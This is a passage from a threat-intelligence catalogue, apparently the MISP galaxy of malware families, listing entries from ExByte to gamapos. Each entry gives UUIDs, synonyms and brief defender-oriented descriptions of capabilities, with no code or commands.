UUID 42f4fee9-a5c2-4643-be56-fba8700f835d which can be used as unique global reference for ExByte in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Excalibur

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Excalibur.

Known Synonyms
`Saber`
`Sabresac`

Internal MISP references

UUID 3cec2c3c-1669-40cf-8612-eb826f7d2c98 which can be used as unique global reference for Excalibur in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

MS Exchange Tool

Internal MISP references

UUID 74f8db32-799c-41e5-9815-6272908ede57 which can be used as unique global reference for MS Exchange Tool in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Exile RAT

ExileRAT is a simple RAT platform capable of getting information on the system (computer name, username, listing drives, network adapter, process name), getting/pushing files and executing/terminating processes.

Internal MISP references

UUID c932a2f3-1470-4b0c-8412-2d081901277b which can be used as unique global reference for Exile RAT in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

ExMatter

Exfiltration tool written in .NET, used by at least one BlackMatter ransomware operator.

Internal MISP references

UUID 615e22f7-1b0e-44a0-a666-b95cb6b5e279 which can be used as unique global reference for ExMatter in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Exorcist

According to PCrisk, Exorcist is a ransomware-type malicious program. Systems infected with this malware experience data encryption and users receive ransom demands for decryption. During the encryption process, all compromised files are appended with an extension consisting of a ransom string of characters.

For example, a file originally named "1.jpg" could appear as something similar to "1.jpg.rnyZoV" following encryption. After this process is complete, Exorcist ransomware changes the desktop wallpaper and drops HTML applications - "[random-string]-decrypt.hta" (e.g. "rnyZoV-decrypt.hta") - into affected folders. These files contain identical ransom messages.

Internal MISP references

UUID d742986c-04f0-48ef-aaa3-10eeb0e95be4 which can be used as unique global reference for Exorcist in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Expiro

Expiro malware has been around for more than a decade, and the malware authors sill continue their work and update it with more features. Also the infection routine was changed in samples fround in 2017 (described by McAfee). Expiro "infiltrates" executables on 32- and 64bit Windows OS versions. It has capabilities to install browser extensions, change security behaviour/settings on the infected system, and steal information (e.g. account credentials). There is a newly described EPO file infector source code called m0yv in 2022, which is wrongly identified as expiro by some AVs.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Expiro.

Known Synonyms
`Xpiro`

Internal MISP references

UUID fd34b588-7b00-4924-827b-6118bece0af1 which can be used as unique global reference for Expiro in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

ExplosiveRAT

Internal MISP references

UUID d3600857-b941-4d47-81ef-02c168396518 which can be used as unique global reference for ExplosiveRAT in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Xtreme RAT

According to Trend MIcro, Extreme RAT (XTRAT, Xtreme Rat) is a Remote Access Trojan that can steal information. This RAT has been used in attacks targeting Israeli and Syrian governments last 2012.

This malware family of backdoors has the capability to receive commands such as File Management (Download, Upload, and Execute Files), Registry Management (Add, Delete, Query, and Modify Registry), Perform Shell Command, Computer Control (Shutdown, Log on/off), and Screen capture from a remote attacker. In addition, it can also log keystrokes of the infected systems.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Xtreme RAT.

Known Synonyms
`ExtRat`

Internal MISP references

UUID 6ec2b6b1-c1a7-463a-b135-edb51764cf38 which can be used as unique global reference for Xtreme RAT in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Eye Pyramid

Internal MISP references

UUID a7489029-21d4-44c9-850a-8f656a98cb22 which can be used as unique global reference for Eye Pyramid in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

EYService

EYService is the main part of the backdoor used by Nazar APT. This a passive backdoor that relies on, now discontinued, Packet Sniffer SDK (PSSDK) from Microolap.

Internal MISP references

UUID 9b287426-e82f-407e-8d12-42dac4241bf8 which can be used as unique global reference for EYService in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Fabookie

Fabookie is facebook account info stealer.

Internal MISP references

UUID 782aa125-42ff-4ca0-b9b1-362aac08566b which can be used as unique global reference for Fabookie in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

FakeCry

Malware written in .NET that mimics WannaCry.

Internal MISP references

UUID c9ac3322-c176-444c-8d72-603430dca2d0 which can be used as unique global reference for FakeCry in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

FakeRean

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular FakeRean.

Known Synonyms
`Braviax`

Internal MISP references

UUID 653df134-88c9-47e2-99a5-06e0406ab6d4 which can be used as unique global reference for FakeRean in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

FakeTC

Internal MISP references

UUID 6b0030bc-6e45-43b0-9175-15fe8fbd0942 which can be used as unique global reference for FakeTC in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

FakeWord

Internal MISP references

UUID 6eb3546c-cb8b-447c-81d1-9c4c1166581d which can be used as unique global reference for FakeWord in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

fancyfilter

FancyFilter is a piece of code that documents code overlap between frameworks used by Regin and Equation Group.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular fancyfilter.

Known Synonyms
`0xFancyFilter`

Internal MISP references

UUID e7d06257-2bc6-45b6-8728-080df9932f90 which can be used as unique global reference for fancyfilter in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Fanny

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Fanny.

Known Synonyms
`DEMENTIAWHEEL`

Internal MISP references

UUID 6d441619-c5f5-45ff-bc63-24cecd0b237e which can be used as unique global reference for Fanny in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

FantomCrypt

According to PCrisk, Fantom is a ransomware-type virus that imitates the Windows update procedure while encrypting files. This is unusual, since most ransomware encrypts files stealthily without showing any activity. During encryption, Fantom appends the names of encrypted files with the ".locked4", ".fantom" or ".locked" extension.

Internal MISP references

UUID 29f4ae5a-4ccd-451b-bd3e-d301865da034 which can be used as unique global reference for FantomCrypt in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Farseer

Internal MISP references

UUID f197b0a8-6bea-42ea-b57f-8f6f202f7602 which can be used as unique global reference for Farseer in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

FastLoader

FastLoader is a small .NET downloader, which name comes from PDB strings seen in samples. It typically downloads TrickBot. It may create a list of processes and uploads it together with screenshot(s). In more recent versions, it employs simple anti-analysis checks (VM detection) and comes with string obfuscations.

Internal MISP references

UUID 21b86dbb-d000-449c-bfe4-41faede4bd89 which can be used as unique global reference for FastLoader in MISP communities and other software using the MISP galaxy

External references

https://malpedia.caad.fkie.fraunhofer.de/details/win.fastloader - webarchive

Associated metadata

Metadata key	Value
type	[]

FastPOS

Internal MISP references

UUID 1bf03bbb-d3a2-4713-923b-218186c86914 which can be used as unique global reference for FastPOS in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

FatalRat

According to PCrisk, FatalRAT is the name of a Remote Access Trojan (RAT). A RAT is a type of malware that allows the attacker to remotely control the infected computer and use it for various purposes.

Typically, RATs are used to access files and other data, watch computing activities on the screen and capture screenshots, steal sensitive information (e.g., login credentials, credit card details).

There are many legitimate remote administration/access tools on the Internet. It is common that cybercriminals use those tools with malicious intent too.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular FatalRat.

Known Synonyms
`Sainbox RAT`

Internal MISP references

UUID 28697d08-27c0-47a9-bfd6-654cac4d55cc which can be used as unique global reference for FatalRat in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

FatDuke

According to ESET Research, FatDuke is the current flagship backdoor of APT29 and is only deployed on the most interesting machines. It is generally dropped by the MiniDuke backdoor, but ESET also have seen the operators dropping FatDuke using lateral movement tools such as PsExec.The operators regularly repack this malware in order to evade detections. The most recent sample of FatDuke that ESET have seen was compiled on May 24, 2019. They have seen them trying to regain control of a machine multiple times in a few days, each time with a different sample. Their packer, described in a later section, adds a lot of code, leading to large binaries. While the effective code should not be larger than 1MB, ESET have seen one sample weighing in at 13MB, hence our name for this backdoor component: FatDuke.

Internal MISP references

UUID 4325c84b-9a9b-4e7c-977f-20d7ae817b7e which can be used as unique global reference for FatDuke in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Fauppod

Internal MISP references

UUID e363918a-92ec-49c0-b3b2-1d339200417b which can be used as unique global reference for Fauppod in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

FCT

Ransomware.

Internal MISP references

UUID a4eb3f1f-2cc6-4a0f-9dd8-6ebc192ec0cd which can be used as unique global reference for FCT in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

FDMTP

FDMTP is a newly discovered hacking tool developed in .NET, used by Earth Preta. It functions as a simple malware downloader and is based on the TouchSocket framework over the Duplex Message Transport Protocol (DMTP). In one campaign, threat actors embedded FDMTP in the data section of a DLL. This allows it to be launched through DLL side-loading. The embedded network configurations are encoded and encrypted to enhance security and evade detection, utilizing Base64 and DES encryption methods. It has been observed to serve as a secondary control tool, often deployed by the PUBLOAD backdoor.

Internal MISP references

UUID 61a023be-3f35-4340-8d4a-8ffd2a5e035e which can be used as unique global reference for FDMTP in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

FeedLoad

Internal MISP references

UUID a9cd466f-af46-48fa-906e-15cf27525c7f which can be used as unique global reference for FeedLoad in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Felismus

Internal MISP references

UUID 07a41ea7-17b2-4852-bfd7-54211c477dc0 which can be used as unique global reference for Felismus in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Felixroot

Internal MISP references

UUID e58755ac-3d0c-4ed3-afeb-e929816c8018 which can be used as unique global reference for Felixroot in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

fengine

Internal MISP references

UUID 3087a4ed-1b6c-49f6-980f-59242825d2ee which can be used as unique global reference for fengine in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Fenix

Internal MISP references

UUID e367f4e8-fcff-4a25-a7b9-095be2f797df which can be used as unique global reference for Fenix in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Feodo

Feodo (also known as Cridex or Bugat) is a Trojan used to commit e-banking fraud and to steal sensitive information from the victims computer, such as credit card details or credentials.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Feodo.

Known Synonyms
`Bugat`
`Cridex`

Internal MISP references

UUID 66781866-f064-467d-925d-5e5f290352f0 which can be used as unique global reference for Feodo in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

FFDroider

According to PCrisk, FFDroider is a malicious program classified as a stealer. It is designed to extract and exfiltrate sensitive data from infected devices. FFDroider targets popular social media and e-commerce platforms in particular.

Internal MISP references

UUID f557e98e-7e8c-450f-a2a2-abbe81a67a90 which can be used as unique global reference for FFDroider in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Ficker Stealer

According to CyberArk, this malware is used to steal sensitive information, including login credentials, credit card information, cryptocurrency wallets and browser information from applications such as WinSCP, Discord, Google Chrome, Electrum, etc. It does all that by implementing a different approach than other stealers (we’ll cover it later). Additionally, FickerStealer can function as a File Grabber and collect additional files from the compromised machine, and it can act as a Downloader to download and execute several second-stage malware.

Internal MISP references

UUID 6ad46852-24f3-4415-a4ab-57a52cd8a1cb which can be used as unique global reference for Ficker Stealer in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

FileIce

Internal MISP references

UUID ed0b8ac9-973b-4aaa-9904-8c7ed2e73933 which can be used as unique global reference for FileIce in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Filerase

Filerase is a .net API-based utility capable of propagating and recursively deleting files.

Internal MISP references

UUID e5fbb536-4994-4bd5-b151-6d5e41ed9f5b which can be used as unique global reference for Filerase in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Final1stSpy

Internal MISP references

UUID 87467366-679d-425c-8bea-b9f77c543252 which can be used as unique global reference for Final1stSpy in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

FindPOS

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular FindPOS.

Known Synonyms
`Poseidon`

Internal MISP references

UUID ae914b9a-67a2-425d-bef0-3a9624a207ba which can be used as unique global reference for FindPOS in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

FinFisher RAT

FinFisher is a commercial software used to steal information and spy on affected victims. It began with few functionalities which included password harvesting and information leakage, but now it is mostly known for its full Remote Access Trojan (RAT) capabilities. It is mostly known for being used in governmental targeted and lawful criminal investigations. It is well known for its anti-detection capabilities and use of VMProtect.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular FinFisher RAT.

Known Synonyms
`FinSpy`

Internal MISP references

UUID 541b64bc-87ec-4cc2-aaee-329355987853 which can be used as unique global reference for FinFisher RAT in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

FINTEAM

Recently, Check Point researchers spotted a targeted attack against officials within government finance authorities and representatives in several embassies in Europe. The attack, which starts with a malicious attachment disguised as a top secret US document, weaponizes TeamViewer, the popular remote access and desktop sharing software, to gain full control of the infected computer. This is achieved by sideloading another DLL among the legit TeamViewer.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular FINTEAM.

Known Synonyms
`TeamBot`

Internal MISP references

UUID 045469d0-5bb2-4ed9-9ee2-a0a08f437433 which can be used as unique global reference for FINTEAM in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Fireball

Internal MISP references

UUID 9ad28356-184c-4f02-89f5-1b70981598c3 which can be used as unique global reference for Fireball in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

FireBird RAT

Internal MISP references

UUID 0d63d92b-6d4d-470d-9f13-acce0c76911c which can be used as unique global reference for FireBird RAT in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Fire Chili

The purpose of this rootkit/driver is hiding and protecting malicious artifacts from user-mode components(e.g. files, processes, registry keys and network connections). According to Fortguard Labs, this malware uses Direct Kernel Object Modification (DKOM), which involves undocumented kernel structures and objects, for its operations, why this malware has to rely on specific OS builds.

Internal MISP references

UUID 762ea155-1cec-4c67-9c4f-7e8f4c21e19e which can be used as unique global reference for Fire Chili in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

FireCrypt

Internal MISP references

UUID c4346ed0-1d74-4476-a78c-299bce0409bd which can be used as unique global reference for FireCrypt in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

FireMalv

Internal MISP references

UUID 9715c6bc-4b1e-49a2-b1d8-db4f4c4f042c which can be used as unique global reference for FireMalv in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

FirstRansom

Internal MISP references

UUID 1ab17959-6254-49af-af26-d34e87073e49 which can be used as unique global reference for FirstRansom in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

FishMaster

A custom loader for CobaltStrike.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular FishMaster.

Known Synonyms
`JollyJellyfish`

Internal MISP references

UUID dd73f0c7-3bc6-4dc9-a0b7-507490df2a84 which can be used as unique global reference for FishMaster in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

FiveHands

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular FiveHands.

Known Synonyms
`Thieflock`

Internal MISP references

UUID 4d0dc7a3-07bf-4cb9-ba86-c7f154c6b678 which can be used as unique global reference for FiveHands in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

FK_Undead

This malware family is mainly spread through various private server clients in bundles, and mainly tamper with user system network data packets through technical means such as TDI filtering, DNS hijacking, HTTP(s) injection, and HOSTS redirection, hijacking normal web page access to designated private server websites, and using security software cloud detection and killing data packet shielding, shutdown callback rewriting and other means to achieve counter-detection.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular FK_Undead.

Known Synonyms
`Undead`

Internal MISP references

UUID 97e332bf-e229-44e6-a48b-b5b45947a856 which can be used as unique global reference for FK_Undead in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Flagpro

According to PICUS, Flagpro is malware that collects information from the victim and executes commands in the victim’s environment. It targets Japan, Taiwan, and English-speaking countries. When a victim is infected with Flagpro malware, the malware can do the following:

Download and execute a tool Execute OS commands and send results Collect and send Windows authentication information

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Flagpro.

Known Synonyms
`BUSYICE`

Internal MISP references

UUID f6b10719-0f7a-45bc-9e47-1406b9966890 which can be used as unique global reference for Flagpro in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Flame

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Flame.

Known Synonyms
`sKyWIper`

Internal MISP references

UUID c40dbede-490f-4df4-a242-a2461e3cfc4e which can be used as unique global reference for Flame in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

FLASHFLOOD

FLASHFLOOD will scan inserted removable drives for targeted files, and copy those files from the removable drive to the FLASHFLOOD-infected system. FLASHFLOOD may also log or copy additional data from the victim computer, such as system information or contacts.

Internal MISP references

UUID 0ce7e94e-da65-43e4-86f0-9a0bb21d1118 which can be used as unique global reference for FLASHFLOOD in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

FlashDevelop

According to Intezer, this is a shellcode loader.

Internal MISP references

UUID 36e0e97f-fb94-4224-83a9-83274f274fe9 which can be used as unique global reference for FlashDevelop in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

FlawedAmmyy

FlawedAmmyy is a well-known Remote Access Tool (RAT) attributed to criminal gang TA505 and used to get the control of target machines. The name reminds the strong link with the leaked source code of Ammyy Admin from which it took the main structure.

Internal MISP references

UUID 18419355-fd28-41a6-bffe-2df68a7166c4 which can be used as unique global reference for FlawedAmmyy in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

FlawedGrace

According to ProofPoint, FlawedGrace is written in C++ and can be categorized as a Remote Access Trojan (RAT). It seems to have been developed in the second half of 2017 mainly.

FlawedGrace uses a series of commands: FlawedGrace also uses a series of commands, provided below for reference: * desktop_stat * destroy_os * target_download * target_module_load * target_module_load_external * target_module_unload * target_passwords * target_rdp * target_reboot * target_remove * target_script * target_servers * target_update * target_upload

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular FlawedGrace.

Known Synonyms
`GraceWire`

Internal MISP references

UUID ef591233-4246-414b-9fbd-46838f3e5da2 which can be used as unique global reference for FlawedGrace in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

FlexiSpy (Windows)

Internal MISP references

UUID 2431a1e5-4e64-454a-94c8-8a95f88d2d4a which can be used as unique global reference for FlexiSpy (Windows) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

FlokiBot

Internal MISP references

UUID 057ff707-a008-4ab8-8370-22b689ed3412 which can be used as unique global reference for FlokiBot in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

FlowCloud

Internal MISP references

UUID b018c5a7-ab70-4df0-b5aa-ceb1efd4b541 which can be used as unique global reference for FlowCloud in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

FlowerShop

Internal MISP references

UUID 0024c2d9-673f-4999-b240-4ae61a72c9b9 which can be used as unique global reference for FlowerShop in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Floxif

Internal MISP references

UUID b1b2e501-b68f-4e2e-ab98-85e9bda0fbcd which can be used as unique global reference for Floxif in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Flusihoc

Available since 2015, Flusihoc is a versatile C++ malware capable of a variety of DDoS attacks as directed by a Command and Control server. Flusihoc communicates with its C2 via HTTP in plain text.

Internal MISP references

UUID 79e9df7d-abc8-45bd-abd3-be9b975f1a03 which can be used as unique global reference for Flusihoc in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

FlyingDutchman

Internal MISP references

UUID a6f4d003-abe5-46ed-9e71-555b067f4d5a which can be used as unique global reference for FlyingDutchman in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

FlyStudio

Internal MISP references

UUID 19228908-ba8b-4718-86b3-209c7f1ae0bf which can be used as unique global reference for FlyStudio in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Fobber

Internal MISP references

UUID bb836040-c161-4932-8f89-bc2ca2e8c1c0 which can be used as unique global reference for Fobber in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

FONIX

Internal MISP references

UUID f8d501bc-cf5a-4e19-a7fa-fb0aac18cc63 which can be used as unique global reference for FONIX in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

ForestTiger

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular ForestTiger.

Known Synonyms
`ScoringMathTea`

Internal MISP references

UUID 685106fc-05ba-4d3b-90c3-91486986c35d which can be used as unique global reference for ForestTiger in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Formbook

FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Formbook.

Known Synonyms
`win.xloader`

Internal MISP references

UUID 8378b417-605e-4196-b31f-a0c96d75aa50 which can be used as unique global reference for Formbook in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

FormerFirstRAT

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular FormerFirstRAT.

Known Synonyms
`ffrat`

Internal MISP references

UUID 9aacd2c7-bcd6-4a82-8250-cab2e4e2d402 which can be used as unique global reference for FormerFirstRAT in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

FortuneCrypt

Internal MISP references

UUID 02caba7c-1820-40a3-94ae-dc89b5662b3e which can be used as unique global reference for FortuneCrypt in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

FoxSocket

Internal MISP references

UUID 61b35242-0e16-4502-a909-f4fd5e32abcb which can be used as unique global reference for FoxSocket in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

FPSpy

Internal MISP references

UUID c3b865a8-6d2d-4ed4-a534-2db4d2e9a579 which can be used as unique global reference for FPSpy in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

FRat

A RAT employing Node.js, Sails, and Socket.IO to collect information on a target

Internal MISP references

UUID 695f3381-302f-4fd0-b7a5-4e852291ce91 which can be used as unique global reference for FRat in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Freenki Loader

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Freenki Loader.

Known Synonyms
`SHUTTERSPEED`

Internal MISP references

UUID f86b675a-b7b2-4a40-b4fd-f62fd96440f1 which can be used as unique global reference for Freenki Loader in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

FriedEx

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular FriedEx.

Known Synonyms
`BitPaymer`
`DoppelPaymer`
`IEncrypt`

Internal MISP references

UUID 58ae14a9-c4aa-490c-8404-0eb590f5650d which can be used as unique global reference for FriedEx in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Fs0ciety

Internal MISP references

UUID 1587112e-fb7f-411b-af04-0dd7484befd5 which can be used as unique global reference for Fs0ciety in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

FudModule

FudModule is a user-mode DLL that gets the ability to read and write arbitrary kernel memory via the BYOVD technique. Its main goal is to turn off Windows system monitoring features, which is done by modifying kernel variables and removing kernel callbacks. Its actions may very likely affect various types of security products, e.g. EDRs, firewalls, antimalware and even digital forensics tools.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular FudModule.

Known Synonyms
`LIGHTSHOW`

Internal MISP references

UUID 49b53f39-3e13-48e7-a2e3-5e173af343b3 which can be used as unique global reference for FudModule in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

win.fujinama

Fujinama is a custom VB info stealer capable to execute custom commands and custom exfiltrations, keylogging and screenshot. It was involved in the compromise of Leonardo SpA, a major Italian aerospace and defense company.

Internal MISP references

UUID efd4ec64-ad22-424b-9b7a-d9060cc29d3b which can be used as unique global reference for win.fujinama in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

FunnySwitch

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular FunnySwitch.

Known Synonyms
`RouterGod`

Internal MISP references

UUID 58eb97d1-0c29-4596-bd4a-4590b28d988f which can be used as unique global reference for FunnySwitch in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

FunnyDream

Internal MISP references

UUID 46417b64-928a-43cd-91a6-ecee4c6cd4a7 which can be used as unique global reference for FunnyDream in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Furtim

Internal MISP references

UUID c9d78931-318c-4b34-af33-c90f6612a4f1 which can be used as unique global reference for Furtim in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

FusionDrive

Internal MISP references

UUID 5de632a3-bf82-4cef-90fa-e7199fdb932c which can be used as unique global reference for FusionDrive in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

FuwuqiDrama

FuwuqiDrama is a server-side RAT. It manages client connections by utilizing I/O completion ports, which are usually used in high-performance server applications as an elegant solution to manage many clients at once.

It contains two distinguishing hardcoded lists.

First is a list of ~50 video files of South Korean TV series, having their titles translated to Mandarin Chinese, but encoded in the form of Pinyin romanization. That means the sounds are spelled in Latin alphabet without tone marks, for example meiyounihuobuxiaqu.avi represents Can't Live Without You (a K-drama from 2012) or wulalafufu.avi translates to Ohlala Couple (also from 2012).

Second is the list of the following corporations: NVIDIA, Amazon, Intel, Skype, 360Safe, Rising, Tencent, Mozilla, Adobe, Yahoo, Google. The same list is contained in some of the WannaCryptor samples.

FuwuqiDrama stores its configuration in the INI file data\package_con_x86.cat. It contains the port number and a bot identifier, all within a single section called Fuwuqi – the romanized Chinese word for server.

Internal MISP references

UUID 9284445c-96a8-445d-8e9d-93a093ffbe63 which can be used as unique global reference for FuwuqiDrama in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

FuxSocy

FuxSocy has some similarities to win.cerber but is tracked as its own family for now.

Internal MISP references

UUID 289b4ffd-d406-44b1-99d4-3406dfd24adb which can be used as unique global reference for FuxSocy in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

GaboonGrabber

According to ANY.RUN, the GaboonGrabber is a malware developed in .NET that grabs its embedded resources to prepare multiple fileless stages. Additionally, it has the tendency to camouflage itself as a legitimate application, going so far as to mimic legitimate applications in its decompiled code. It also includes a steganographic image used to prepare further payloads.

GaboonGrabber's final stage can deploy various types of malware, including Snake Keylogger, AgentTesla, Redline, Lokibot, and more.

Internal MISP references

UUID 455e4248-ba91-4bc9-8459-7d9c54d5dda6 which can be used as unique global reference for GaboonGrabber in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Gacrux

Internal MISP references

UUID 551140ca-001b-49d8-aa06-82a5aebb02dd which can be used as unique global reference for Gacrux in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

GalaxyLoader

GalaxyLoader is a simple .NET loader. Its name stems from the .pdb and the function naming.

It seems to make use of iplogger.com for tracking. It employed WMI to check the system for - IWbemServices::ExecQuery - SELECT * FROM Win32_Processor - IWbemServices::ExecQuery - select * from Win32_VideoController - IWbemServices::ExecQuery - SELECT * FROM AntivirusProduct

Internal MISP references

UUID c12f1363-2bc8-4ffb-8f31-cbb5f85e0ffe which can be used as unique global reference for GalaxyLoader in MISP communities and other software using the MISP galaxy

External references

https://malpedia.caad.fkie.fraunhofer.de/details/win.galaxyloader - webarchive

Associated metadata

Metadata key	Value
type	[]

gamapos

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular gamapos.

Known Synonyms
`pios`

Internal MISP references

UUID 8f785ee5-1663-4972-9a64-f02e7c46ba66 which can be used as unique global reference for gamapos in MISP communities and other software using the MISP galaxy

